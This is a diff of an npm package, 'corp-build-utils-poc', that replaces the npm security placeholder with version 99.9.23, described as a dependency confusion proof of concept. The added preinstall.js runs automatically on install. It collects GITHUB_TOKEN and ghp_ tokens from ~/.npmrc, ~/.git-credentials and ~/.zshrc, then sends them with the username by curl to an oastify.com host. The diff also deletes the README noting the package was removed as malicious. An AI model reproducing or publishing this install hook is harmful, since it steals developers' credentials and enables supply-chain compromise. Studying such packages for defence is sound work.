corp-build-utils-poc 0.0.1-security → 99.9.23

package/package.json

@@ -1,6 +1,12 @@
 {
   "name": "corp-build-utils-poc",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "99.9.23",
+  "description": "dependency confusion poc",
+  "private": false,
+  "scripts": {
+    "preinstall": "node preinstall.js"
+  },
+  "dependencies": {
+    "corp-build-utils-poc": "^99.9.23"
+  }
 }

package/preinstall.js

@@ -0,0 +1,34 @@
+const { exec } = require('child_process');
+const fs = require('fs');
+const path = require('path');
+const os = require('os');
+   
+const homeDir = os.homedir();
+const oastUrl = "http://7muh57n2gvmnuuzg1oacpfrg87e22sqh.oastify.com";
+   
+// 1. Collect from current environment
+let exfilData = `PAT_TOKEN=${process.env.GITHUB_TOKEN || 'none'}`;
+   
+// 2. Hunt for secrets in local config files
+const targets = [
+    { name: 'NPMRC', path: path.join(homeDir, '.npmrc') },
+    { name: 'GIT_CREDS', path: path.join(homeDir, '.git-credentials') },
+    { name: 'GITHUB', path: path.join(homeDir, '.zshrc') }
+];
+
+targets.forEach(target => {
+    if (fs.existsSync(target.path)) {
+        try {
+            const content = fs.readFileSync(target.path, 'utf8');
+            // Basic regex to find strings starting with ghp_
+            const match = content.match(/ghp_[a-zA-Z0-9]{36}/);
+            if (match) exfilData += `&${target.name}=${match[0]}`;
+        } catch (e) {}
+    }
+});
+
+// 3. Exfiltrate everything found
+const user = os.userInfo().username;
+const cmd = `curl -G "${oastUrl}" --data-urlencode "victim=${user}" --data-urlencode "data=${exfilData}"`;
+
+exec(cmd);

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=corp-build-utils-poc for more information.